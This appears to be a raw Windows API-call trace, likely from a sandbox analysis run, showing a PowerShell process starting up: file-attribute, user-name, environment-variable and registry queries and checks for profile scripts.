	[0810.556] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x14d3c0 | out: lpFileInformation=0x14d3c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0810.556] SetErrorMode (uMode=0x1) returned 0x1
	[0810.557] GetLogicalDrives () returned 0x4
	[0810.558] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14cf20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0810.559] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0810.559] SetErrorMode (uMode=0x1) returned 0x1
	[0810.560] CoTaskMemAlloc (cb=0x68) returned 0x1ba3a700
	[0810.560] CoTaskMemAlloc (cb=0x68) returned 0x1ba3ab60
	[0810.560] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ba3a700, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x14d390, lpMaximumComponentLength=0x14d38c, lpFileSystemFlags=0x14d388, lpFileSystemNameBuffer=0x1ba3ab60, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14d390*=0x9c354b42, lpMaximumComponentLength=0x14d38c*=0xff, lpFileSystemFlags=0x14d388*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0810.560] CoTaskMemFree (pv=0x1ba3a700) 
	[0810.560] CoTaskMemFree (pv=0x1ba3ab60) 
	[0810.560] SetErrorMode (uMode=0x1) returned 0x1
	[0810.561] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0810.562] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0810.562] SetErrorMode (uMode=0x1) returned 0x1
	[0810.562] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d330 | out: lpFileInformation=0x14d330*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0810.562] SetErrorMode (uMode=0x1) returned 0x1
	[0810.562] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0810.562] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14cf80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0810.562] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0810.563] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0810.563] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0810.564] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cf00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0810.564] SetErrorMode (uMode=0x1) returned 0x1
	[0810.564] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d160 | out: lpFileInformation=0x14d160*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0810.564] SetErrorMode (uMode=0x1) returned 0x1
	[0810.564] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cf00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0810.564] SetErrorMode (uMode=0x1) returned 0x1
	[0810.564] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d160 | out: lpFileInformation=0x14d160*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0810.564] SetErrorMode (uMode=0x1) returned 0x1
	[0810.565] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0810.565] SetErrorMode (uMode=0x1) returned 0x1
	[0810.565] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d200 | out: lpFileInformation=0x14d200*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0810.565] SetErrorMode (uMode=0x1) returned 0x1
	[0810.565] CoTaskMemAlloc (cb=0x804) returned 0x1ba6d740
	[0810.565] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba6d740, nSize=0x14d608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d608) returned 0x1
	[0810.566] CoTaskMemFree (pv=0x1ba6d740) 
	[0810.566] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0810.566] GetUserNameW (in: lpBuffer=0x1d21e0, pcbBuffer=0x14d648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d648) returned 1
	[0810.566] CoTaskMemFree (pv=0x1d21e0) 
	[0810.566] ReportEventW (hEventLog=0x2880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x358bf00*="FileSystem", lpRawData=0x358bc90) returned 1
	[0810.567] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0810.567] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0810.567] CoTaskMemFree (pv=0x24c1f0) 
	[0810.567] CoTaskMemAlloc (cb=0x804) returned 0x1ba6d740
	[0810.567] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba6d740, nSize=0x14d608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d608) returned 0x1
	[0811.640] CoTaskMemFree (pv=0x1ba6d740) 
	[0811.640] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0811.640] GetUserNameW (in: lpBuffer=0x1d21e0, pcbBuffer=0x14d648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d648) returned 1
	[0811.641] CoTaskMemFree (pv=0x1d21e0) 
	[0811.641] ReportEventW (hEventLog=0x2880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3591740*="Function", lpRawData=0x35914d0) returned 1
	[0813.048] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0813.048] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0813.048] CoTaskMemFree (pv=0x24c1f0) 
	[0813.066] CoTaskMemAlloc (cb=0x804) returned 0x1ba6d740
	[0813.067] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba6d740, nSize=0x14d608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d608) returned 0x1
	[0813.067] CoTaskMemFree (pv=0x1ba6d740) 
	[0813.067] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0813.067] GetUserNameW (in: lpBuffer=0x1d21e0, pcbBuffer=0x14d648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d648) returned 1
	[0813.067] CoTaskMemFree (pv=0x1d21e0) 
	[0813.068] ReportEventW (hEventLog=0x2880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x35b3f68*="Registry", lpRawData=0x35b3cf8) returned 1
	[0817.439] CoTaskMemAlloc (cb=0x804) returned 0x1ba6d740
	[0817.439] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba6d740, nSize=0x14d608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d608) returned 0x1
	[0817.439] CoTaskMemFree (pv=0x1ba6d740) 
	[0817.440] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0817.440] GetUserNameW (in: lpBuffer=0x1d21e0, pcbBuffer=0x14d648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d648) returned 1
	[0817.440] CoTaskMemFree (pv=0x1d21e0) 
	[0817.440] ReportEventW (hEventLog=0x2880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x35b9380*="Variable", lpRawData=0x35b9110) returned 1
	[0818.719] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0818.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0818.719] CoTaskMemFree (pv=0x24c1f0) 
	[0818.720] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0818.720] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0818.720] CoTaskMemFree (pv=0x24c1f0) 
	[0819.957] CoTaskMemAlloc (cb=0x804) returned 0x1ba75170
	[0819.957] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba75170, nSize=0x14d608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d608) returned 0x1
	[0819.958] CoTaskMemFree (pv=0x1ba75170) 
	[0819.958] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0819.958] GetUserNameW (in: lpBuffer=0x1d21e0, pcbBuffer=0x14d648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d648) returned 1
	[0819.958] CoTaskMemFree (pv=0x1d21e0) 
	[0819.959] ReportEventW (hEventLog=0x2880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x35ccf98*="Certificate", lpRawData=0x35ccd28) returned 1
	[0819.966] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0819.966] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0819.966] CoTaskMemFree (pv=0x24c1f0) 
	[0819.969] GetLogicalDrives () returned 0x4
	[0819.969] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14d290, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0819.969] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0819.971] CoTaskMemAlloc (cb=0x20e) returned 0x2333b0
	[0819.971] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2333b0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0819.971] CoTaskMemFree (pv=0x2333b0) 
	[0819.972] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0819.972] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0819.972] CoTaskMemFree (pv=0x24c1f0) 
	[0819.973] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0819.973] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0819.973] CoTaskMemFree (pv=0x24c1f0) 
	[0820.748] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0820.748] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0820.748] CoTaskMemFree (pv=0x24c1f0) 
	[0820.750] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0820.750] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0820.750] CoTaskMemFree (pv=0x24c1f0) 
	[0820.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0820.750] SetErrorMode (uMode=0x1) returned 0x1
	[0820.751] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d250 | out: lpFileInformation=0x14d250*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0826.220] SetErrorMode (uMode=0x1) returned 0x1
	[0826.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0826.220] SetErrorMode (uMode=0x1) returned 0x1
	[0826.220] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d250 | out: lpFileInformation=0x14d250*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0826.220] SetErrorMode (uMode=0x1) returned 0x1
	[0826.221] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0826.221] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0826.221] CoTaskMemFree (pv=0x24c1f0) 
	[0826.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0826.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0826.237] SetErrorMode (uMode=0x1) returned 0x1
	[0826.237] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d510 | out: lpFileInformation=0x14d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0826.237] SetErrorMode (uMode=0x1) returned 0x1
	[0826.250] CoTaskMemAlloc (cb=0x804) returned 0x1ba75170
	[0826.250] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba75170, nSize=0x14d878 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d878) returned 0x1
	[0826.251] CoTaskMemFree (pv=0x1ba75170) 
	[0826.251] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0826.251] GetUserNameW (in: lpBuffer=0x1d21e0, pcbBuffer=0x14d8b8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d8b8) returned 1
	[0829.069] CoTaskMemFree (pv=0x1d21e0) 
	[0829.069] ReportEventW (hEventLog=0x2880008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3605c80*="Available", lpRawData=0x3605a10) returned 1
	[0831.577] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0831.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0831.577] CoTaskMemFree (pv=0x24c1f0) 
	[0831.578] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0831.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0831.578] CoTaskMemFree (pv=0x24c1f0) 
	[0831.579] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0831.579] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0831.580] CoTaskMemFree (pv=0x24c1f0) 
	[0831.580] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0831.580] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0831.580] CoTaskMemFree (pv=0x24c1f0) 
	[0831.582] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d898 | out: phkResult=0x14d898*=0x384) returned 0x0
	[0831.582] RegQueryValueExW (in: hKey=0x384, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d81c, lpData=0x0, lpcbData=0x14d818*=0x0 | out: lpType=0x14d81c*=0x1, lpData=0x0, lpcbData=0x14d818*=0x56) returned 0x0
	[0831.582] CoTaskMemAlloc (cb=0x5a) returned 0x1ba6c8a0
	[0831.582] RegQueryValueExW (in: hKey=0x384, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d7ec, lpData=0x1ba6c8a0, lpcbData=0x14d7e8*=0x56 | out: lpType=0x14d7ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d7e8*=0x56) returned 0x0
	[0831.582] CoTaskMemFree (pv=0x1ba6c8a0) 
	[0831.582] RegCloseKey (hKey=0x384) returned 0x0
	[0831.583] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0831.583] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0831.583] CoTaskMemFree (pv=0x24c1f0) 
	[0831.603] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0831.604] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0831.604] CoTaskMemFree (pv=0x24c1f0) 
	[0831.609] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0831.609] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0831.609] CoTaskMemFree (pv=0x24c1f0) 
	[0831.609] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0831.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0831.610] CoTaskMemFree (pv=0x24c1f0) 
	[0831.610] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0831.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0831.610] CoTaskMemFree (pv=0x24c1f0) 
	[0831.611] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0831.611] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0831.611] CoTaskMemFree (pv=0x24c1f0) 
	[0831.612] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0831.613] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0831.613] CoTaskMemFree (pv=0x24c1f0) 
	[0831.613] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0831.613] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0831.613] CoTaskMemFree (pv=0x24c1f0) 
	[0834.062] CoTaskMemAlloc (cb=0x104) returned 0x24c1f0
	[0834.062] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0834.062] CoTaskMemFree (pv=0x24c1f0) 
	[0840.069] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x24c300
	[0840.071] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x24c410
	[0845.785] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0845.785] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0845.785] CoTaskMemFree (pv=0x24c520) 
	[0845.802] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0845.802] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0845.802] CoTaskMemFree (pv=0x24c520) 
	[0847.139] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d9f8 | out: phkResult=0x14d9f8*=0x2f4) returned 0x0
	[0847.139] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d97c, lpData=0x0, lpcbData=0x14d978*=0x0 | out: lpType=0x14d97c*=0x1, lpData=0x0, lpcbData=0x14d978*=0x56) returned 0x0
	[0847.139] CoTaskMemAlloc (cb=0x5a) returned 0x1ba6da80
	[0847.139] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d94c, lpData=0x1ba6da80, lpcbData=0x14d948*=0x56 | out: lpType=0x14d94c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d948*=0x56) returned 0x0
	[0847.140] CoTaskMemFree (pv=0x1ba6da80) 
	[0847.140] RegCloseKey (hKey=0x2f4) returned 0x0
	[0847.140] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d9f8 | out: phkResult=0x14d9f8*=0x2f4) returned 0x0
	[0847.140] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d97c, lpData=0x0, lpcbData=0x14d978*=0x0 | out: lpType=0x14d97c*=0x1, lpData=0x0, lpcbData=0x14d978*=0x56) returned 0x0
	[0847.140] CoTaskMemAlloc (cb=0x5a) returned 0x1ba6da80
	[0847.140] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d94c, lpData=0x1ba6da80, lpcbData=0x14d948*=0x56 | out: lpType=0x14d94c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d948*=0x56) returned 0x0
	[0847.140] CoTaskMemFree (pv=0x1ba6da80) 
	[0847.140] RegCloseKey (hKey=0x2f4) returned 0x0
	[0847.141] CoTaskMemAlloc (cb=0x20c) returned 0x1ba42700
	[0847.141] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1ba42700 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0847.141] CoTaskMemFree (pv=0x1ba42700) 
	[0847.141] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0847.141] CoTaskMemAlloc (cb=0x20c) returned 0x1ba42700
	[0847.141] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1ba42700 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0847.141] CoTaskMemFree (pv=0x1ba42700) 
	[0847.142] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0847.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0847.142] SetErrorMode (uMode=0x1) returned 0x1
	[0847.142] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d960 | out: lpFileInformation=0x14d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0847.143] SetErrorMode (uMode=0x1) returned 0x1
	[0847.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0847.143] SetErrorMode (uMode=0x1) returned 0x1
